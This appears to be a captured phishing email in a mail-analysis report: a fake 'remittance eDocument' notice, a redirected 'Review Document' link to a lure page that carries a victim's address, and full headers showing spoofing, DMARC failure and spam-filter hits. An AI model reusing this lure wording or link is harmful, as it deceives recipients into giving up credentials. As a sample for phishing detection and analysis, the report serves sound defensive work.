                                      • [EXTERNAL EMAIL: Take caution with links and attachments. ] Your eDocument is ready. Hi user, Please find remittance for the payment processed on January 16, 2024 by clicking this button: Review Document <https://clicktime.cloud.postoffice.net/clicktime.php?U=https://fub.direct/1/wpcpz2KV6CJLjr9Ku5V9crqS4vRSbleRYVQVlbRDO0VhTlcqWS8eK4Wwlk02n24rcdimfqv_ywSiT_-hMwRGjBfgg1rcvHOcCbgDl1KQiWE/https/bahraincv.com/z63a2/6rr8dwuafolbxjbyml78hjrfslcaiy/alsco1171%40naver.com&E=cwilson%40firstfedweb.com&X=XID252daPm6J6574Xd1&T=FF1001&HV=U,E,X,T&H=5f30d80bfc49ccfd2ec3457f652892e61ef725c0> Or copy/paste this link to your browser: ________________________________ Questions? Simply reply to this email. {udomain} Service Desk | 1-888-250-8971 <tel:1-888-250-8971> | [email} | Twitter <https://clicktime.cloud.postoffice.net/clicktime.php?U=https://mailer.samanage.com/ls/click%3Fupn%3Du001.OwzZc87aARPCaEzPsO5TaRb9yVbN1LzKEIQlDyEjylkVPzMYc3hK1lyhY9U9JnsQI-3O_5OOxTcJtQ1F0AGWxzbhLCnHtxv6Skh9IU9EshHbPgOqgoNyn67N8jW6-2BxenwZJ4D87xQFoflXJpW5RiCPl98BcAiLPGLWmuRSfPCMe5yoJ3kMD49Rerx2KeIAL-2B9h4pegFRclAX4XBcBJw571NbQzM5HXOyxkxrUX8oNvhqTpa8W05CrA6zKnJX-2FNBpZsvF7ZjwaY2EYiqyOWZ-2Fdp3sJ-2FF9orvFsEqx4szC0BOt-2BWBNI2A4KlXhqqJBCUplnq34p-2FcBNm2geGffl0AeKkj3nzkX-2By-2F7ULa0U98312nMznQrHBcReplzwLpk1ZEKg93MJ90rVAf4Auq3iaqEZmipp7VgYfvFD4Lq9BuZBkITnFjQ52ZbFtcU9lGu5yWcy1MQp&E=cwilson%40firstfedweb.com&X=XID252daPm6J6574Xd1&T=FF1001&HV=U,E,X,T&H=916f0593958ddb61a38518ccb443ae58be2b8c31> | Facebook <https://clicktime.cloud.postoffice.net/clicktime.php?U=https://mailer.samanage.com/ls/click%3Fupn%3Du001.zi5jYUxwJ-2B9g-2BhxDwu5-2Fkg09RC6nUlgZPSzVUHUPncyB3NtX3MkMm6cz-2B4VhiW2Uz3FY_5OOxTcJtQ1F0AGWxzbhLCnHtxv6Skh9IU9EshHbPgOqgoNyn67N8jW6-2BxenwZJ4D87xQFoflXJpW5RiCPl98BcAiLPGLWmuRSfPCMe5yoJ3kMD49Rerx2KeIAL-2B9h4pegFRclAX4XBcBJw571NbQzM5HXOyxkxrUX8oNvhqTpa8W05CrA6zKnJX-2FNBpZsvF7ZjwaY2EYiqyOWZ-2Fdp3sJ-2FF9orvFsEqx4szC0BOt-2BWBNk-2BEx2PFei6Rl1NW4O5lSAs95M04Llyfi4dru2VAxx8RxdYgvoA1i8KQGE6SX7mKuv2BbmON5xM2azf8weVYwVmEeZZbEBPxZHvi9R3eC0drcXGnQpX18UaTfqh5K8sLUZlFugtBPI4YC-2BuolKdQT7&E=cwilson%40firstfedweb.com&X=XID252daPm6J6574Xd1&T=FF1001&HV=U,E,X,T&H=c49349e144376cc635ca69cc18b09078cd1ac29e> | Blog <https://clicktime.cloud.postoffice.net/clicktime.php?U=https://mailer.samanage.com/ls/click%3Fupn%3Du001.Mx4SSLZxEU2WaKO7j3r6LAnl1AejIR76oSNxAG2MeUyfzCWuK-2BZ1VvUF1Zc5pE6aoNrF_5OOxTcJtQ1F0AGWxzbhLCnHtxv6Skh9IU9EshHbPgOqgoNyn67N8jW6-2BxenwZJ4D87xQFoflXJpW5RiCPl98BcAiLPGLWmuRSfPCMe5yoJ3kMD49Rerx2KeIAL-2B9h4pegFRclAX4XBcBJw571NbQzM5HXOyxkxrUX8oNvhqTpa8W05CrA6zKnJX-2FNBpZsvF7ZjwaY2EYiqyOWZ-2Fdp3sJ-2FF9orvFsEqx4szC0BOt-2BWBPYPIBJGHD22nct74mjZumCFJIP-2FvqcMfn9Np5sERDWNN6YE8VjBGUKN2td2HYXP6v0o3puyUErhuDXEGXIcZY9U-2BJnRFtRI0v7PzATd-2ByLAlcKcASOLRrTIj2fnKKjMe9thkaXkoumqaX5s-2F4r4z3Z&E=cwilson%40firstfedweb.com&X=XID252daPm6J6574Xd1&T=FF1001&HV=U,E,X,T&H=31c5b18d17575c0bd4e5219f82d813a92eb63209> | LinkedIn <https://clicktime.cloud.postoffice.net/clicktime.php?U=https://mailer.samanage.com/ls/click%3Fupn%3Du001.zi5jYUxwJ-2B9g-2BhxDwu5-2Fkvfd7bbSAHKuVjmml4JtHch75zvI3AduhX4mF-2Brg0jOnOn2I5XU5or9ZaebSEGgvKw-3D-3DKDth_5OOxTcJtQ1F0AGWxzbhLCnHtxv6Skh9IU9EshHbPgOqgoNyn67N8jW6-2BxenwZJ4D87xQFoflXJpW5RiCPl98BcAiLPGLWmuRSfPCMe5yoJ3kMD49Rerx2KeIAL-2B9h4pegFRclAX4XBcBJw571NbQzM5HXOyxkxrUX8oNvhqTpa8W05CrA6zKnJX-2FNBpZsvF7ZjwaY2EYiqyOWZ-2Fdp3sJ-2FF9orvFsEqx4szC0BOt-2BWBOrUVvGMl-2FXLzauFQtT0YawPD8TPivKOxi-2B1fZDCX4T3uMjpMiaojbnCYTMz05cFxrQLlNYce8LzT8QxukiKkCMcy1gt4BU9s-2FsBZ6Zobc1Atsbo7BkpCji4v-2FRGzw2noMwiDIjegSOz-2B1-2FIlHQhsSh&E=cwilson%40firstfedweb.com&X=XID252daPm6J6574Xd1&T=FF1001&HV=U,E,X,T&H=3676b21f3ef86fe8dedba98dd7d7ae22ebda4b11> /p> <https://clicktime.cloud.postoffice.net/clicktime.php?U=https://mailer.samanage.com/ls/click%3Fupn%3Du001.J8Wm48ULAAoyNaFSLnBTkBm4sicnBWaW9HD5lj5GfNZ3QWvFVe-2B0-2BsUngdr8JkMlsJNHkNzXpBmRCAq5b7U3Y33aAIF9ggEFFEWP7a9hnNw-3D7yhA_5OOxTcJtQ1F0AGWxzbhLCnHtxv6Skh9IU9EshHbPgOqgoNyn67N8jW6-2BxenwZJ4D87xQFoflXJpW5RiCPl98BcAiLPGLWmuRSfPCMe5yoJ3kMD49Rerx2KeIAL-2B9h4pegFRclAX4XBcBJw571NbQzM5HXOyxkxrUX8oNvhqTpa8W05CrA6zKnJX-2FNBpZsvF7ZjwaY2EYiqyOWZ-2Fdp3sJ-2FF9orvFsEqx4szC0BOt-2BWBNOdvMy0NAKf6w06dOD4HyRi87WaaWRXCJ8-2FPIZidN8MQwVZk6hDa7IHXiXpupRbauYYDic9g7PNeX2R2AXRZQzAtcLEZxFA1Qzh80eppmWw20EZKTGXmrjH57lUr9E6ZOk492UStIbUnW-2FCM6aefdw&E=cwilson%40firstfedweb.com&X=XID252daPm6J6574Xd1&T=FF1001&HV=U,E,X,T&H=1c12c42022b3da2fb1fe558d24e616710485f92f> <https://clicktime.cloud.postoffice.net/clicktime.php?U=https://mailer.samanage.com/ls/click%3Fupn%3Du001.WSOZBAs3f8-2Fr7dgg-2BW6eyWFsuGZzDVnTr57ADPNZe-2FQjuj-2BhGK7F59uSPoZpjqdo9yheb6-2Bhj5KZlr2hUdrhrQBHowbcNrU9HA7h6j2meHHlfPLNZZN6NDYapPMEIfMwH6AD5-2F1D2xOC3jZYDTFeOEgM-2BS1Dt50nCB8NJCfVxm2SsFVDJnW8oQ1UIJ-2F-2F-2FclErHdv2gtOF6omsZLOwcnndw-3D-3D201e_5OOxTcJtQ1F0AGWxzbhLCnHtxv6Skh9IU9EshHbPgOqgoNyn67N8jW6-2BxenwZJ4D87xQFoflXJpW5RiCPl98BcAiLPGLWmuRSfPCMe5yoJ3kMD49Rerx2KeIAL-2B9h4pegFRclAX4XBcBJw571NbQzM5HXOyxkxrUX8oNvhqTpa8W05CrA6zKnJX-2FNBpZsvF7ZjwaY2EYiqyOWZ-2Fdp3sJ-2FF9orvFsEqx4szC0BOt-2BWBMVNvlAruzDNoVGFuiM71uan5dkaeLqUJU8-2BFY6RDDVaCv1Nldwl5c3FwaexObNcUktRzywIFrlPjOGSY21vtaL2shZlvixlA1hDslubJk041pg4ctQIj1wFky82rYFtVq7T4YHf8zGTlTO6sxWCSO6&E=cwilson%40firstfedweb.com&X=XID252daPm6J6574Xd1&T=FF1001&HV=U,E,X,T&H=eb533936ec2b24219e63b98e8c27668b3214c046> Disclaimer: We have reviewed the contract for insurance purposes only. We are not in a position to provide legal advice, and thus our review is based on coverage in force at the time of the review. The comments made in this review are not intended to be a substitute for a review of the contract by your companys legal counsel and accordingly, it is recommended that your counsel review this contract. We disclaim any and all liabilities arising from this review and any final contract language. As governed by insurance law in all states, a Certificate of Insurance cannot extend or alter coverage provided in an insurance policy in any way. Policy rights and conditions can only be extended through the policies and endorsements. To comply with state regulations and ACORD standards, our company policy is to provide copies of the actual forms contained within the evidenced policies to those that request them. Along these lines, what is stated in the Description of Operations is solely and strictly based on information provided to this agency by the named insured. https://clicktime.cloud.postoffice.net/clicktime.php?U=https://scenvironmental.samanage.com/activate/eyJhbGciOiJIUzI1NiJ9.eyJlbWFpbCI6ImNoZXJ5bEBzY2Vudmlyb25tZW50YWwuY2EiLCJhY2NvdW50IjpudWxsLCJleHBpcmVkIjoiMjAyNC0xMS0wOSAwMDozOTo0MSBVVEMifQ._ZQP-byL-c3t1ArY7HeMzKmTxR1K-dUoXlrjHqecX0o&E=cwilson%40firstfedweb.com&X=XID252daPm6J6574Xd1&T=FF1001&HV=U,E,X,T&H=dc52b503f0a0af8f13bcd3011c97d468b89ee35b <https://clicktime.cloud.postoffice.net/clicktime.php?U=https://mailer.samanage.com/ls/click%3Fupn%3Du001.HF-2F4tkZ5BkdRwB973UOuNU83PyGZPZGgev8MG9MROkYKLlzq6dYbFIQ0Wp6-2FVOqitUz4KJ44JaY7-2FJ6x9a1NuuQI4gtcFBkpNfqIyb2tcmk3ghcwPyH4xxczxqNh07TBcw2bN0NpkqQ1FtrEfJeo-2FDBichJe82LIWW0kQL2M-2F6AxWMpBDawaaL0hUuLzPsRop3rAwy1WquPKYsXp-2FMTckqEHWNsYnqbuTAWWorwRfjiQ7-2FeiNiMIMv0AdJgg3b3Vz6Atlo6US0kEMREAFWZiAQHn7BrHXnCJFC7Rb8IWwXHTxXMBIPCDL8Ug9Nwn74Vyb94U_5OOxTcJtQ1F0AGWxzbhLCnHtxv6Skh9IU9EshHbPgOqgoNyn67N8jW6-2BxenwZJ4D87xQFoflXJpW5RiCPl98BcAiLPGLWmuRSfPCMe5yoJ3kMD49Rerx2KeIAL-2B9h4pegFRclAX4XBcBJw571NbQzM5HXOyxkxrUX8oNvhqTpa8W05CrA6zKnJX-2FNBpZsvF7ZjwaY2EYiqyOWZ-2Fdp3sJ-2FF9orvFsEqx4szC0BOt-2BWBPIwOHq4vI-2FpxeP-2FlP-2BoxMVFBgMnFDdV1PmPLpD8DuYSF4JnPAa1rcDKd7Jij2Q7Py3pz8YsYwOcrJBJbUx14AIxTjLJuhHjyzPZialD5u-2FRjfG9GqhGW-2B2yeXEQfZ0QxfYUOdBsLrCB9QoQfj2PHni&E=cwilson%40firstfedweb.com&X=XID252daPm6J6574Xd1&T=FF1001&HV=U,E,X,T&H=b86cbb914efff989efa37569dcdd9425495ebfa9>
                                      Attachments:
                                        Key Value
                                        ReceivedFri, 17 Jan 2025 09:15:52 -0800
                                        ARC-Seali=1; a=rsa-sha256; d=silversky.com; s=silversky-20150623192408; t=1737134144; cv=none; b=MarduS8a4VTRMJlxRvuozPLvYfov6LPyitCgIl1d0h1QORdEld3Jt3/KEZdWT1OKxgxqDzpMpIU8Qu1IReNDk5pIcdWLrOzJ6WhtjEdbCJ9LPYm8XJOZfHggqN7BDN9ePbaW8K1tXyfkTfb+MyJT9IqSeKcRNFhMDUKMdKxv628=
                                        ARC-Message-Signaturei=1; a=rsa-sha256; d=silversky.com; s=silversky-20150623192408; t=1737134144; c=relaxed/simple; bh=BfYivrErTN673SviLOj9GwpyEUgeubhrafjKckPA7fY=; h=From:To:Subject:Date; b=CEBhxHDW8xQzPJZdpnqoCLAG5fivLqIQDCLJuEJl/d9k8EUlMhVZBAeAcOjFgL25kA9JBU8CkeP5pwlViTU13LFIBUL05f5qSjH7RpvFHw0WfWBs+dT2k2eZIcu5tOEdu5I3WKfsQKqtZ2vtXfIFr7V7Zk32vGZeENH4WFNMv3M=
                                        ARC-Authentication-Resultsi=1; gwsin.silversky.com; dmarc=pass policy.dmarc=none header.from=thearbagroup.com; dkim=none; spf=pass smtp.mailfrom=thearbagroup.com; arc=none smtp.remote-ip=206.117.240.236
                                        authentication-resultsspf=softfail (sender IP is 165.212.64.87) smtp.mailfrom=thearbagroup.com; dkim=none (message not signed) header.d=none;dmarc=fail action=quarantine header.from=thearbagroup.com;compauth=none reason=451
                                        received-spfSoftFail (protection.outlook.com: domain of transitioning thearbagroup.com discourages use of 165.212.64.87 as permitted sender)
                                        X-USANET-Receivedfrom emd1.mbox.net [165.212.64.8] by gws2.mbox.net via mtad (C8.MAIN.4.26U) with ESMTP id 700daPm6J5824Ms2; Thu, 16 Jan 2025 12:57:09 -0000
                                        X-USANET-TAP-Score1
                                        X-BAEAI-Quarantine-Release-Spam_AV-Userunknown
                                        Authentication-Results-Originalgwsin.silversky.com; dmarc=pass policy.dmarc=none header.from=thearbagroup.com; dkim=none; spf=pass smtp.mailfrom=thearbagroup.com; arc=none smtp.remote-ip=206.117.240.236
                                        X-USANET-Routed100 IN-RELAY R:gwsin-int:625
                                        X-USANET-GWS2-Servicegwsdin-tap preclick-never
                                        X-USANET-GWS2-Tenantfirstfedweb.com
                                        X-USANET-GWS2-TagidFF1001
                                        X-USANET-GWS2-MailFromDnsResultDnsFound
                                        X-USANET-GWS2-SecurityTLSv1.2;ECDHE-RSA-AES256-GCM-SHA384
                                        X-USANET-Source206.117.240.236 IN danielw@thearbagroup.com email.shadik.com TLS
                                        X-USANET-MsgIdXID252daPm6J6574Xd1
                                        X-BAEAI-Trust-Score68
                                        X-BAEAI-Trust-ReasonsSNDRAUTH; RCPTFRG; SNDRNEW; DOMRARE,thearbagroup.com; RCPTVIP;
                                        Thread-TopicCompleted: Please Review Remittance eDocument_PrintScan_1962.pdf
                                        Thread-IndexAdtoFiMGEXgsfGB5RJyzzcNg8LUmRA==
                                        Accept-Languageen-US
                                        Content-Languageen-US
                                        X-MS-Has-Attach
                                        X-MS-TNEF-Correlator
                                        x-originating-ip[40.90.192.170]
                                        x-c2processedorg6ba02b50-3656-4919-9ee0-45af6749a9ca
                                        X-USANET-SpamCspam
                                        X-Cloudmark-Trackerv=2.4 cv=ca4ZrWDM c=1 sm=1 tr=0 ts=67890227 cx=a_idp_d p=3UBLnPBwAAAA:8 p=g5BPWuElaEEA:10 p=CRjS4uKKONYdHZD0mRKQ:22 p=QhnmdGnfZl10ibMM-eB4:22 a=Th71IOv2UKEFLIUO3xxeAg==:117 a=Th71IOv2UKEFLIUO3xxeAg==:17 a=xqWC_Br6kY4A:10 a=tcnJUJiHlNUA:10 a=VdSt8ZQiCzkA:10 a=t2fj5NrpAAAA:8 a=_kqLnAfwAAAA:8 a=WXGgB6l3AAAA:8 a=aiZQwZ7oDF895FkjcFQA:9 a=CjuIK1q_8ugA:10 a=-FEs8UIgK8oA:10 a=VtUAnezVAAAA:8 a=1RHby_vtIKSzhqZgslMA:9 a=gfOAcnMd3sy0UEYc:21 a=_W_S_7VecoQA:10 a=lqcHg5cX4UMA:10 a=Ko-jbQXUCB6ArCsYEnw1:22 a=bsUo9Tuum60ilkPOD17d:22 a=_DLPDHIXDY4eC_hEUbMI:22 a=S39TjSYE69Kti-02AJUr:22 a=d65IBo_BBUZJjnZkANmL:22 a=Wek7A-RUP7zhWJvFAREr:22 a=wGdmxXhPVLjtJH5WJGV8:22 a=9kjMlTncOCrqFGt6ogWR:22 a=8D53uu4iJqLOlrRWd67z:22 a=gnbZQBmExIAN499Zi1tb:22 a=ZOJjtUtsIznJmQ7qIUeP:22 a=udIrqqGTqgLI_nlrwCpK:22 a=4MmT0gk-9-J2g2A9bAwk:22 a=cPQSjfK2_nFv0Q5t_7PE:22 a=poXaRoVlC6wW9_mwW8W4:22 a=p-dnK0njbqwfn1k4-x12:22 a=P3fMaJMKd_wdyUQKDHwh:22 a=NWVoK91CQySWRX1oVYDe:22
                                        X-LASED-VersionAntispam-Engine: 5.1.4, AntispamData: 2025.1.16.121546
                                        X-LASED-SpamProbability0.087066
                                        X-LASED-SpamNonSpam
                                        X-LASED-HitsBODYTEXTH_SIZE_3000_MORE 0.000000, BODY_SIZE_10000_PLUS 0.000000, FRAUD_X3 1.000000, FRAUD_X3_LARGE_BODY -1.000000, FROM_SAME_AS_TO 0.050000, FROM_SAME_AS_TO_DOMAIN 0.000000, HREF_LABEL_TEXT_NO_URI 0.000000, HREF_LABEL_TEXT_ONLY 0.000000, HTML_90_100 0.100000, HTML_FONT_INVISIBLE 0.100000, SENDER_NO_AUTH 0.000000, SUPERLONG_LINE 0.050000, WEBMAIL_SOURCE 0.000000, WEBMAIL_XOIP 0.000000, WEBMAIL_X_IP_HDR 0.000000, __ANY_URI 0.000000, __ATTACH_CTE_QUOTED_PRINTABLE 0.000000, __BODY_TEXT_X4 0.000000, __BUSINESS_SIGNATURE 0.000000, __CP_URI_IN_BODY 0.000000, __CT 0.000000, __CTYPE_HAS_BOUNDARY 0.000000, __CTYPE_MULTIPART 0.000000, __CTYPE_MULTIPART_ALT 0.000000, __EXCESSIVE_NEWLINES 0.000000, __FRAUD_COMMON 0.000000, __FRAUD_CONTACT_NUM 0.000000, __FRAUD_INTRO 0.000000, __FRAUD_PARTNERSHIP 0.000000, __FRAUD_REPLY 0.000000, __FROM_ADDY_SHORT_LC 0.000000, __FROM_DOMAIN_IN_ANY_TO1 0.000000, __FROM_DOMAIN_NOT_IN_BODY 0.000000, __FROM_NAME_NOT_IN_BODY 0.000000, __FUR_HEADER 0.000000, __HAS_FROM 0.000000, __HAS_HTML 0.000000, __HAS_MSGID 0.000000, __HAS_XOIP 0.000000, __HREF_LABEL_PHISH 0.000000, __HREF_LABEL_TEXT 0.000000, __HTML_AHREF_TAG 0.000000, __HTML_BAD_END 0.000000, __HTML_BOLD 0.000000, __HTML_HREF_TAG_X2 0.000000, __HTML_TAG_CENTER 0.000000, __HTML_TAG_DIV 0.000000, __HTML_TAG_TABLE 0.000000, __HTTPS_URI 0.000000, __IMG_THEN_TEXT 0.000000, __INVOICE_MULTILINGUAL 0.000000, __MIME_HTML 0.000000, __MIME_TEXT_H 0.000000, __MIME_TEXT_H1 0.000000, __MIME_TEXT_H2 0.000000, __MIME_TEXT_P 0.000000, __MIME_TEXT_P1 0.000000, __MIME_TEXT_P2 0.000000, __MIME_VERSION 0.000000, __MSGID_32HEX 0.000000, __MULTIPLE_URI_HTML 0.000000, __MULTIPLE_URI_TEXT 0.000000, __PART_TYPE_HTML 0.000000, __PHISH_PHRASE10 0.000000, __PHISH_SPEAR_GREETING 0.000000, __RCVD_FROM_HOMEUSER 0.000000, __SANE_MSGID 0.000000, __STOCK_CRUFT 0.000000, __SUBJ_ENDS_IN_FILE_EXT 0.000000, __TAG_EXISTS_BODY 0.000000, __TAG_EXISTS_HEAD 0.000000, __TAG_EXISTS_HTML 0.000000, __TAG_EXISTS_META 0.000000, __TOLL_FREE_PHONE_US 0.000000, __TO_DOMAIN_IN_FROM 0.000000, __TO_DOMAIN_IN_MSGID 0.000000, __TO_MALFORMED_2 0.000000, __TO_NAME 0.000000, __TO_NAME_DIFF_FROM_ACC 0.000000, __TO_REAL_NAMES 0.000000, __URI_CTA_NOT_DOCUSIGN2 0.000000, __URI_ENDS_IN_SLASH 0.000000, __URI_HAS_HYPHEN_USC 0.000000, __URI_IN_BODY 0.000000, __URI_IN_BODY_HTTP_X10 0.000000, __URI_MAILTO 0.000000, __URI_NOT_IMG 0.000000, __URI_NO_WWW 0.000000, __URI_NS 0.000000, __URI_TEL 0.000000, __URI_WITHOUT_PATH 0.000000, __URI_WITH_PATH 0.000000
                                        X-LASED-ImpersonationFalse
                                        X-Sophos-Tracker0.087066 b7819f385761e4ed4e992346049d74f52ef498b2
                                        X-BAEAI-Source-GeoIP"US" "N/A" "N/A"
                                        X-BAEAI-SPFPASS
                                        X-BAEAI-DKIMNONE
                                        X-BAEAI-DMARCpass
                                        X-SilverSky-ARCnone
                                        X-BAEAI-Authentication-Ratingstrong
                                        X-BAEAI-Trust-Levelgreen
                                        Return-Pathdanielw@thearbagroup.com
                                        X-MS-Exchange-Organization-ExpirationStartTime17 Jan 2025 17:15:45.4487 (UTC)
                                        X-MS-Exchange-Organization-ExpirationStartTimeReasonOriginalSubmit
                                        X-MS-Exchange-Organization-ExpirationInterval1:00:00:00.0000000
                                        X-MS-Exchange-Organization-ExpirationIntervalReasonOriginalSubmit
                                        X-MS-Exchange-Organization-Network-Message-Id 1fdd664b-7e99-4473-2e0f-08dd371a9460
                                        X-EOPAttributedMessage0
                                        X-EOPTenantAttributedMessage3778f0b2-789a-4d43-b25e-d4fe25a4c3c0:0
                                        X-MS-Exchange-Organization-MessageDirectionalityIncoming
                                        x-ms-publictraffictypeEmail
                                        X-MS-TrafficTypeDiagnostic BL6PEPF0001AB71:EE_|SJ0PR22MB3851:EE_|SN4PR22MB2854:EE_
                                        x-ms-exchange-organization-authsource BL6PEPF0001AB71.namprd02.prod.outlook.com
                                        x-ms-exchange-organization-authasAnonymous
                                        X-MS-Office365-Filtering-Correlation-Id 1fdd664b-7e99-4473-2e0f-08dd371a9460
                                        X-MS-Exchange-AtpMessagePropertiesSA|SL
                                        X-MS-Exchange-Organization-SCL-1
                                        X-MS-Exchange-Organization-BypassClutter$true
                                        X-Microsoft-Antispam BCL:0;ARA:13230040|82310400026|5073199012|12012899012|5063199012|8096899003;
                                        x-forefront-antispam-report CIP:165.212.64.87;CTRY:US;LANG:en;SCL:-1;SRV:;IPV:NLI;SFV:NSPM;H:postin03.mbox.net;PTR:postin03.mbox.net;CAT:NONE;SFS:(13230040)(82310400026)(5073199012)(12012899012)(5063199012)(8096899003);DIR:INB;
                                        X-MS-Exchange-CrossTenant-OriginalArrivalTime17 Jan 2025 17:15:45.2299 (UTC)
                                        X-MS-Exchange-CrossTenant-Network-Message-Id 1fdd664b-7e99-4473-2e0f-08dd371a9460
                                        X-MS-Exchange-CrossTenant-Id3778f0b2-789a-4d43-b25e-d4fe25a4c3c0
                                        X-MS-Exchange-CrossTenant-AuthSource BL6PEPF0001AB71.namprd02.prod.outlook.com
                                        X-MS-Exchange-CrossTenant-AuthAsAnonymous
                                        X-MS-Exchange-CrossTenant-FromEntityHeaderInternet
                                        X-MS-Exchange-Transport-CrossTenantHeadersStampedSJ0PR22MB3851
                                        X-MS-Exchange-Transport-EndToEndLatency00:00:06.8944390
                                        X-MS-Exchange-Processed-By-BccFoldering15.20.8356.008
                                        X-Microsoft-Antispam-Mailbox-Delivery ucf:0;jmr:0;auth:0;dest:I;ENG:(910001)(944506478)(944626604)(920097)(930097)(140003);
                                        X-Microsoft-Antispam-Message-Info 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
                                        acceptlanguageen-US
                                        x-ms-exchange-organization-originalclientipaddress165.212.64.87
                                        x-ms-exchange-organization-originalserveripaddress10.167.242.164
                                        X-Priority3
                                        X-MSMail-PriorityNormal
                                        Message-ID<c016ba7cd192416db98e6a9ed2a05826@thearbagroup.com>
                                        FromDaniel Wintner <danielw@thearbagroup.com>
                                        ToDaniel Wintner <danielw@thearbagroup.com>
                                        SubjectCompleted: Please Review Remittance eDocument_PrintScan_1962.pdf
                                        DateThu, 16 Jan 2025 04:57:06 -0800
                                        MIME-Version1.0
                                        Content-typeMultipart/alternative; charset="windows-1252"; boundary="00B0FEED_message_boundary"
                                        Content-DescriptionMultipart message

                                        Icon Hash:46070c0a8e0c67d6